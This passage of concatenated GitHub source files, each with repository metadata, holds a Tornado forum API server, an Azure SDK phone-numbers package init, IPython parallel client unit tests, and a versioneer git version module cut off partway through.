"name": "Shell",
"bytes": "38791"
}
],
"symlink_target": ""
} |
import os
import sys
root_dir = os.path.join('/', 'home', 'igor', 'Projects', 'python', 'forum')
os.chdir(root_dir)
sys.path.append(root_dir)
import functools
import json
import logging
import threading
import tornado.web
import tornado.gen
import tornado.ioloop
from tornado.options import define, options
from api import api_executor
from api.util.response_helpers import *
from api.util.DataService import DataService
ds = DataService()
def async_task(func):
@functools.wraps(func)
def async_func(*args, **kwargs):
th = threading.Thread(target=func, args=args, kwargs=kwargs)
th.start()
return async_func
class ThreadMixin(tornado.web.RequestHandler):
def start_worker(self):
threading.Thread(target=self.worker).start()
def _worker(self):
raise NotImplementedError("Abstract method")
def worker(self):
try:
self._worker()
except tornado.web.HTTPError, e:
self.set_status(e.status_code)
except:
logging.error("_worker problem", exc_info=True)
self.set_status(500)
tornado.ioloop.IOLoop.instance().add_callback(self.async_callback(self.results))
def results(self):
if self.get_status() != 200:
self.send_error(self.get_status())
return
if hasattr(self, 'res') and self.res is not None:
self.finish(self.res)
return
if hasattr(self, 'redir'):
self.redirect(self.redir)
return
self.send_error(500)
class Handler(ThreadMixin):
entity = None
action = None
data = None
res = None
def _worker(self):
self.res = api_executor.execute(ds, self.entity, self.action, self.data)
@tornado.web.asynchronous
def get(self, entity, action):
self.entity = entity
self.action = action
self.data = parse_get(self.request.arguments)
self.start_worker()
@tornado.web.asynchronous
def post(self, entity, action):
self.entity = entity
self.action = action
self.data = json.loads(self.request.body, encoding='utf-8')
self.start_worker()
class ClearHandler(ThreadMixin):
res = None
def _worker(self):
self.res = api_executor.clear_db()
@tornado.web.asynchronous
def get(self):
self.send_error(405)
@tornado.web.asynchronous
def post(self):
self.start_worker()
define('port', type=int, default=9001)
def main():
tornado.options.parse_command_line()
application = tornado.web.Application([
(r"/(\S+)/(\S+)", Handler),
(r"/clear/", ClearHandler),
(r"/clear", ClearHandler),
])
logging.info("Server started on port %s", options.port)
application.listen(options.port)
try:
tornado.ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
ds.close_all()
logging.info("Server stopped")
if __name__ == "__main__":
main()
| {
"content_hash": "b48be6361a32849d7eb26aa89c1c75fb",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 88,
"avg_line_length": 24.016,
"alnum_prop": 0.6242504996668887,
"repo_name": "igorcoding/forum-api",
"id": "3f6e1da16f8296e2c89c461d783f3bfc9d9a8b08",
"size": "3020",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/forumserver.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "608"
},
{
"name": "Python",
"bytes": "48289"
},
{
"name": "SQL",
"bytes": "6263"
},
{
"name": "Shell",
"bytes": "4615"
}
],
"symlink_target": ""
} |
from ._phone_numbers_client import PhoneNumbersClient
try:
from ._patch import __all__ as _patch_all
from ._patch import * # type: ignore # pylint: disable=unused-wildcard-import
except ImportError:
_patch_all = []
from ._patch import patch_sdk as _patch_sdk
__all__ = ["PhoneNumbersClient"]
__all__.extend([p for p in _patch_all if p not in __all__])
_patch_sdk()
| {
"content_hash": "2908c2e64a7439279d95bc600509d772",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 82,
"avg_line_length": 29.307692307692307,
"alnum_prop": 0.6745406824146981,
"repo_name": "Azure/azure-sdk-for-python",
"id": "962219d02796e6e45567842cebad432abd90ab1a",
"size": "849",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "sdk/communication/azure-communication-phonenumbers/azure/communication/phonenumbers/_generated/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
"""Tests for parallel client.py
Authors:
* Min RK
"""
#-------------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------
from __future__ import division
import time
from datetime import datetime
import zmq
from IPython import parallel
from IPython.parallel.client import client as clientmod
from IPython.parallel import error
from IPython.parallel import AsyncResult, AsyncHubResult
from IPython.parallel import LoadBalancedView, DirectView
from .clienttest import ClusterTestCase, segfault, wait, add_engines
def setup():
add_engines(4, total=True)
class TestClient(ClusterTestCase):
def test_ids(self):
n = len(self.client.ids)
self.add_engines(2)
self.assertEqual(len(self.client.ids), n+2)
def test_view_indexing(self):
"""test index access for views"""
self.minimum_engines(4)
targets = self.client._build_targets('all')[-1]
v = self.client[:]
self.assertEqual(v.targets, targets)
t = self.client.ids[2]
v = self.client[t]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, t)
t = self.client.ids[2:4]
v = self.client[t]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, t)
v = self.client[::2]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[::2])
v = self.client[1::3]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[1::3])
v = self.client[:-3]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[:-3])
v = self.client[-1]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[-1])
self.assertRaises(TypeError, lambda : self.client[None])
def test_lbview_targets(self):
"""test load_balanced_view targets"""
v = self.client.load_balanced_view()
self.assertEqual(v.targets, None)
v = self.client.load_balanced_view(-1)
self.assertEqual(v.targets, [self.client.ids[-1]])
v = self.client.load_balanced_view('all')
self.assertEqual(v.targets, None)
def test_dview_targets(self):
"""test direct_view targets"""
v = self.client.direct_view()
self.assertEqual(v.targets, 'all')
v = self.client.direct_view('all')
self.assertEqual(v.targets, 'all')
v = self.client.direct_view(-1)
self.assertEqual(v.targets, self.client.ids[-1])
def test_lazy_all_targets(self):
"""test lazy evaluation of rc.direct_view('all')"""
v = self.client.direct_view()
self.assertEqual(v.targets, 'all')
def double(x):
return x*2
seq = list(range(100))
ref = [ double(x) for x in seq ]
# add some engines, which should be used
self.add_engines(1)
n1 = len(self.client.ids)
# simple apply
r = v.apply_sync(lambda : 1)
self.assertEqual(r, [1] * n1)
# map goes through remotefunction
r = v.map_sync(double, seq)
self.assertEqual(r, ref)
# add a couple more engines, and try again
self.add_engines(2)
n2 = len(self.client.ids)
self.assertNotEqual(n2, n1)
# apply
r = v.apply_sync(lambda : 1)
self.assertEqual(r, [1] * n2)
# map
r = v.map_sync(double, seq)
self.assertEqual(r, ref)
def test_targets(self):
"""test various valid targets arguments"""
build = self.client._build_targets
ids = self.client.ids
idents,targets = build(None)
self.assertEqual(ids, targets)
def test_clear(self):
"""test clear behavior"""
self.minimum_engines(2)
v = self.client[:]
v.block=True
v.push(dict(a=5))
v.pull('a')
id0 = self.client.ids[-1]
self.client.clear(targets=id0, block=True)
a = self.client[:-1].get('a')
self.assertRaisesRemote(NameError, self.client[id0].get, 'a')
self.client.clear(block=True)
for i in self.client.ids:
self.assertRaisesRemote(NameError, self.client[i].get, 'a')
def test_get_result(self):
"""test getting results from the Hub."""
c = clientmod.Client(profile='iptest')
t = c.ids[-1]
ar = c[t].apply_async(wait, 1)
# give the monitor time to notice the message
time.sleep(.25)
ahr = self.client.get_result(ar.msg_ids[0])
self.assertTrue(isinstance(ahr, AsyncHubResult))
self.assertEqual(ahr.get(), ar.get())
ar2 = self.client.get_result(ar.msg_ids[0])
self.assertFalse(isinstance(ar2, AsyncHubResult))
c.close()
def test_get_execute_result(self):
"""test getting execute results from the Hub."""
c = clientmod.Client(profile='iptest')
t = c.ids[-1]
cell = '\n'.join([
'import time',
'time.sleep(0.25)',
'5'
])
ar = c[t].execute("import time; time.sleep(1)", silent=False)
# give the monitor time to notice the message
time.sleep(.25)
ahr = self.client.get_result(ar.msg_ids[0])
self.assertTrue(isinstance(ahr, AsyncHubResult))
self.assertEqual(ahr.get().pyout, ar.get().pyout)
ar2 = self.client.get_result(ar.msg_ids[0])
self.assertFalse(isinstance(ar2, AsyncHubResult))
c.close()
def test_ids_list(self):
"""test client.ids"""
ids = self.client.ids
self.assertEqual(ids, self.client._ids)
self.assertFalse(ids is self.client._ids)
ids.remove(ids[-1])
self.assertNotEqual(ids, self.client._ids)
def test_queue_status(self):
ids = self.client.ids
id0 = ids[0]
qs = self.client.queue_status(targets=id0)
self.assertTrue(isinstance(qs, dict))
self.assertEqual(sorted(qs.keys()), ['completed', 'queue', 'tasks'])
allqs = self.client.queue_status()
self.assertTrue(isinstance(allqs, dict))
intkeys = list(allqs.keys())
intkeys.remove('unassigned')
print("intkeys", intkeys)
intkeys = sorted(intkeys)
ids = self.client.ids
print("client.ids", ids)
ids = sorted(self.client.ids)
self.assertEqual(intkeys, ids)
unassigned = allqs.pop('unassigned')
for eid,qs in allqs.items():
self.assertTrue(isinstance(qs, dict))
self.assertEqual(sorted(qs.keys()), ['completed', 'queue', 'tasks'])
def test_shutdown(self):
ids = self.client.ids
id0 = ids[0]
self.client.shutdown(id0, block=True)
while id0 in self.client.ids:
time.sleep(0.1)
self.client.spin()
self.assertRaises(IndexError, lambda : self.client[id0])
def test_result_status(self):
pass
# to be written
def test_db_query_dt(self):
"""test db query by date"""
hist = self.client.hub_history()
middle = self.client.db_query({'msg_id' : hist[len(hist)//2]})[0]
tic = middle['submitted']
before = self.client.db_query({'submitted' : {'$lt' : tic}})
after = self.client.db_query({'submitted' : {'$gte' : tic}})
self.assertEqual(len(before)+len(after),len(hist))
for b in before:
self.assertTrue(b['submitted'] < tic)
for a in after:
self.assertTrue(a['submitted'] >= tic)
same = self.client.db_query({'submitted' : tic})
for s in same:
self.assertTrue(s['submitted'] == tic)
def test_db_query_keys(self):
"""test extracting subset of record keys"""
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted', 'completed'])
for rec in found:
self.assertEqual(set(rec.keys()), set(['msg_id', 'submitted', 'completed']))
def test_db_query_default_keys(self):
"""default db_query excludes buffers"""
found = self.client.db_query({'msg_id': {'$ne' : ''}})
for rec in found:
keys = set(rec.keys())
self.assertFalse('buffers' in keys, "'buffers' should not be in: %s" % keys)
self.assertFalse('result_buffers' in keys, "'result_buffers' should not be in: %s" % keys)
def test_db_query_msg_id(self):
"""ensure msg_id is always in db queries"""
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted', 'completed'])
for rec in found:
self.assertTrue('msg_id' in rec.keys())
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted'])
for rec in found:
self.assertTrue('msg_id' in rec.keys())
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['msg_id'])
for rec in found:
self.assertTrue('msg_id' in rec.keys())
def test_db_query_get_result(self):
"""pop in db_query shouldn't pop from result itself"""
self.client[:].apply_sync(lambda : 1)
found = self.client.db_query({'msg_id': {'$ne' : ''}})
rc2 = clientmod.Client(profile='iptest')
# If this bug is not fixed, this call will hang:
ar = rc2.get_result(self.client.history[-1])
ar.wait(2)
self.assertTrue(ar.ready())
ar.get()
rc2.close()
def test_db_query_in(self):
"""test db query with '$in','$nin' operators"""
hist = self.client.hub_history()
even = hist[::2]
odd = hist[1::2]
recs = self.client.db_query({ 'msg_id' : {'$in' : even}})
found = [ r['msg_id'] for r in recs ]
self.assertEqual(set(even), set(found))
recs = self.client.db_query({ 'msg_id' : {'$nin' : even}})
found = [ r['msg_id'] for r in recs ]
self.assertEqual(set(odd), set(found))
def test_hub_history(self):
hist = self.client.hub_history()
recs = self.client.db_query({ 'msg_id' : {"$ne":''}})
recdict = {}
for rec in recs:
recdict[rec['msg_id']] = rec
latest = datetime(1984,1,1)
for msg_id in hist:
rec = recdict[msg_id]
newt = rec['submitted']
self.assertTrue(newt >= latest)
latest = newt
ar = self.client[-1].apply_async(lambda : 1)
ar.get()
time.sleep(0.25)
self.assertEqual(self.client.hub_history()[-1:],ar.msg_ids)
def _wait_for_idle(self):
"""wait for the cluster to become idle, according to the everyone."""
rc = self.client
# step 0. wait for local results
# this should be sufficient 99% of the time.
rc.wait(timeout=5)
# step 1. wait for all requests to be noticed
# timeout 5s, polling every 100ms
msg_ids = set(rc.history)
hub_hist = rc.hub_history()
for i in range(50):
if msg_ids.difference(hub_hist):
time.sleep(0.1)
hub_hist = rc.hub_history()
else:
break
self.assertEqual(len(msg_ids.difference(hub_hist)), 0)
# step 2. wait for all requests to be done
# timeout 5s, polling every 100ms
qs = rc.queue_status()
for i in range(50):
if qs['unassigned'] or any(qs[eid]['tasks'] + qs[eid]['queue'] for eid in qs if eid != 'unassigned'):
time.sleep(0.1)
qs = rc.queue_status()
else:
break
# ensure Hub up to date:
self.assertEqual(qs['unassigned'], 0)
for eid in [ eid for eid in qs if eid != 'unassigned' ]:
self.assertEqual(qs[eid]['tasks'], 0)
self.assertEqual(qs[eid]['queue'], 0)
def test_resubmit(self):
def f():
import random
return random.random()
v = self.client.load_balanced_view()
ar = v.apply_async(f)
r1 = ar.get(1)
# give the Hub a chance to notice:
self._wait_for_idle()
ahr = self.client.resubmit(ar.msg_ids)
r2 = ahr.get(1)
self.assertFalse(r1 == r2)
def test_resubmit_chain(self):
"""resubmit resubmitted tasks"""
v = self.client.load_balanced_view()
ar = v.apply_async(lambda x: x, 'x'*1024)
ar.get()
self._wait_for_idle()
ars = [ar]
for i in range(10):
ar = ars[-1]
ar2 = self.client.resubmit(ar.msg_ids)
[ ar.get() for ar in ars ]
def test_resubmit_header(self):
"""resubmit shouldn't clobber the whole header"""
def f():
import random
return random.random()
v = self.client.load_balanced_view()
v.retries = 1
ar = v.apply_async(f)
r1 = ar.get(1)
# give the Hub a chance to notice:
self._wait_for_idle()
ahr = self.client.resubmit(ar.msg_ids)
ahr.get(1)
time.sleep(0.5)
records = self.client.db_query({'msg_id': {'$in': ar.msg_ids + ahr.msg_ids}}, keys='header')
h1,h2 = [ r['header'] for r in records ]
for key in set(h1.keys()).union(set(h2.keys())):
if key in ('msg_id', 'date'):
self.assertNotEqual(h1[key], h2[key])
else:
self.assertEqual(h1[key], h2[key])
def test_resubmit_aborted(self):
def f():
import random
return random.random()
v = self.client.load_balanced_view()
# restrict to one engine, so we can put a sleep
# ahead of the task, so it will get aborted
eid = self.client.ids[-1]
v.targets = [eid]
sleep = v.apply_async(time.sleep, 0.5)
ar = v.apply_async(f)
ar.abort()
self.assertRaises(error.TaskAborted, ar.get)
# Give the Hub a chance to get up to date:
self._wait_for_idle()
ahr = self.client.resubmit(ar.msg_ids)
r2 = ahr.get(1)
def test_resubmit_inflight(self):
"""resubmit of inflight task"""
v = self.client.load_balanced_view()
ar = v.apply_async(time.sleep,1)
# give the message a chance to arrive
time.sleep(0.2)
ahr = self.client.resubmit(ar.msg_ids)
ar.get(2)
ahr.get(2)
def test_resubmit_badkey(self):
"""ensure KeyError on resubmit of nonexistant task"""
self.assertRaisesRemote(KeyError, self.client.resubmit, ['invalid'])
def test_purge_hub_results(self):
# ensure there are some tasks
for i in range(5):
self.client[:].apply_sync(lambda : 1)
# Wait for the Hub to realise the result is done:
# This prevents a race condition, where we
# might purge a result the Hub still thinks is pending.
self._wait_for_idle()
rc2 = clientmod.Client(profile='iptest')
hist = self.client.hub_history()
ahr = rc2.get_result([hist[-1]])
ahr.wait(10)
self.client.purge_hub_results(hist[-1])
newhist = self.client.hub_history()
self.assertEqual(len(newhist)+1,len(hist))
rc2.spin()
rc2.close()
def test_purge_local_results(self):
# ensure there are some tasks
res = []
for i in range(5):
res.append(self.client[:].apply_async(lambda : 1))
self._wait_for_idle()
self.client.wait(10) # wait for the results to come back
before = len(self.client.results)
self.assertEqual(len(self.client.metadata),before)
self.client.purge_local_results(res[-1])
self.assertEqual(len(self.client.results),before-len(res[-1]), msg="Not removed from results")
self.assertEqual(len(self.client.metadata),before-len(res[-1]), msg="Not removed from metadata")
def test_purge_local_results_outstanding(self):
v = self.client[-1]
ar = v.apply_async(lambda : 1)
msg_id = ar.msg_ids[0]
ar.get()
self._wait_for_idle()
ar2 = v.apply_async(time.sleep, 1)
self.assertIn(msg_id, self.client.results)
self.assertIn(msg_id, self.client.metadata)
self.client.purge_local_results(ar)
self.assertNotIn(msg_id, self.client.results)
self.assertNotIn(msg_id, self.client.metadata)
with self.assertRaises(RuntimeError):
self.client.purge_local_results(ar2)
ar2.get()
self.client.purge_local_results(ar2)
def test_purge_all_local_results_outstanding(self):
v = self.client[-1]
ar = v.apply_async(time.sleep, 1)
with self.assertRaises(RuntimeError):
self.client.purge_local_results('all')
ar.get()
self.client.purge_local_results('all')
def test_purge_all_hub_results(self):
self.client.purge_hub_results('all')
hist = self.client.hub_history()
self.assertEqual(len(hist), 0)
def test_purge_all_local_results(self):
self.client.purge_local_results('all')
self.assertEqual(len(self.client.results), 0, msg="Results not empty")
self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
def test_purge_all_results(self):
# ensure there are some tasks
for i in range(5):
self.client[:].apply_sync(lambda : 1)
self.client.wait(10)
self._wait_for_idle()
self.client.purge_results('all')
self.assertEqual(len(self.client.results), 0, msg="Results not empty")
self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
hist = self.client.hub_history()
self.assertEqual(len(hist), 0, msg="hub history not empty")
def test_purge_everything(self):
# ensure there are some tasks
for i in range(5):
self.client[:].apply_sync(lambda : 1)
self.client.wait(10)
self._wait_for_idle()
self.client.purge_everything()
# The client results
self.assertEqual(len(self.client.results), 0, msg="Results not empty")
self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
# The client "bookkeeping"
self.assertEqual(len(self.client.session.digest_history), 0, msg="session digest not empty")
self.assertEqual(len(self.client.history), 0, msg="client history not empty")
# the hub results
hist = self.client.hub_history()
self.assertEqual(len(hist), 0, msg="hub history not empty")
def test_spin_thread(self):
self.client.spin_thread(0.01)
ar = self.client[-1].apply_async(lambda : 1)
md = self.client.metadata[ar.msg_ids[0]]
# 3s timeout, 100ms poll
for i in range(30):
time.sleep(0.1)
if md['received'] is not None:
break
self.assertIsInstance(md['received'], datetime)
def test_stop_spin_thread(self):
self.client.spin_thread(0.01)
self.client.stop_spin_thread()
ar = self.client[-1].apply_async(lambda : 1)
md = self.client.metadata[ar.msg_ids[0]]
# 500ms timeout, 100ms poll
for i in range(5):
time.sleep(0.1)
self.assertIsNone(md['received'], None)
def test_activate(self):
ip = get_ipython()
magics = ip.magics_manager.magics
self.assertTrue('px' in magics['line'])
self.assertTrue('px' in magics['cell'])
v0 = self.client.activate(-1, '0')
self.assertTrue('px0' in magics['line'])
self.assertTrue('px0' in magics['cell'])
self.assertEqual(v0.targets, self.client.ids[-1])
v0 = self.client.activate('all', 'all')
self.assertTrue('pxall' in magics['line'])
self.assertTrue('pxall' in magics['cell'])
self.assertEqual(v0.targets, 'all')
| {
"content_hash": "5d7909d047145d1dc3a1d7a272ae34bc",
"timestamp": "",
"source": "github",
"line_count": 555,
"max_line_length": 113,
"avg_line_length": 37.14054054054054,
"alnum_prop": 0.56173288701305,
"repo_name": "EricCline/CEM_inc",
"id": "06aefd303b480b525708d27fd38cac0021c37054",
"size": "20613",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "env/lib/python2.7/site-packages/IPython/parallel/tests/test_client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "124610"
},
{
"name": "JavaScript",
"bytes": "2188363"
},
{
"name": "Python",
"bytes": "9913298"
},
{
"name": "Shell",
"bytes": "3677"
}
],
"symlink_target": ""
} |
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = "bmipy-"
cfg.versionfile_source = "bmipy/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen(
[c] + args,
cwd=cwd,
env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr else None),
)
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {
"version": dirname[len(parentdir_prefix) :],
"full-revisionid": None,
"dirty": False,
"error": None,
"date": None,
}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print(
"Tried directories %s but none started with prefix %s"
% (str(rootdirs), parentdir_prefix)
)
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG) :] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r"\d", r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix) :]
if verbose:
print("picking %s" % r)
return {
"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": None,
"date": date,
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {
"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": "no suitable tags",
"date": None,
}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(
GITS,
[
"describe",
"--tags",
"--dirty",
"--always",
"--long",
"--match",
"%s*" % tag_prefix,
],
cwd=root,
)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[: git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r"^(.+)-(\d+)-g([0-9a-f]+)$", git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = "unable to parse git-describe output: '%s'" % describe_out
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = "tag '%s' doesn't start with prefix '%s'" % (
full_tag,
tag_prefix,
)
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix) :]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[
0
].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
